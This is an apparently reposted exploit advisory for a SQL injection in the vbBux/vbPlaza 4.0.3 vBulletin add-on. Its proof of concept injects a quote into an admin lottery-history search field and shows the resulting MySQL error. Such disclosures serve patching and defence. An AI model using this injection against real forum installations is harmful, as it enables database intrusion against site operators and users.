vbBux / vbPlaza 4.0.3 SQL Injection

[Matt]

Description :

vbBux / vbPlaza version 4.0.3 suffers from a remote SQL injection vulnerability.

Author : n3tw0rk

Source : vbBux / vbPlaza 4.0.3 SQL Injection ? Packet Storm

Code :

# Exploit Title: vbBux and vbPlaza v4 SQLI
            #
# Author(s): n3tw0rk    (twiiter.com/n3tw0rkgod)
           #
# Contact: Mail:infectedelite@gmail.com
           #
# Product: 4.0.3 and below
                   #
# Software Version x.x.x
                    #
# Product Download:
http://www.vbulletin.org/forum/showthread.php?t=270271#
# Homepage: d4tabase.com
               #
_____________________________________________________________#


The exploit is caused due to a variable named 'vbplaza_lottery_history' not
being sanitized before being used within an insert into statement.
 POC
 You will need Admincp Access then go to
http://localhost/admincp/vbplaza_lottery.php?do=searchhistory then in the
force read order column put a
' into the search bar and result should show
Database error in vBulletin 4.2.1:


Invalid SQL:


Database error in vBulletin 4.2.1

Invalid SQL:

SELECT COUNT(*) AS count
FROM vbplaza_lottery_history
WHERE 1=1 AND (lotteryid = ');

MySQL Error   : You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near
'')' at line 3
Error Number  : 1064
Request Date  : Sunday, August 11th 2013 @ 05:17:53 PM
Error Date    : Sunday, August 11th 2013 @ 05:17:54 PM
Script        : http://localhost/admincp/vbplaza_lottery.php?do=findhistory
Referrer      :
http://localhost/admincp/vbplaza_lottery.php?do=searchhistory
IP Address    : ::1
Username      : n3tw0rk
Classname     : vB_Database
MySQL Version : 5.5.27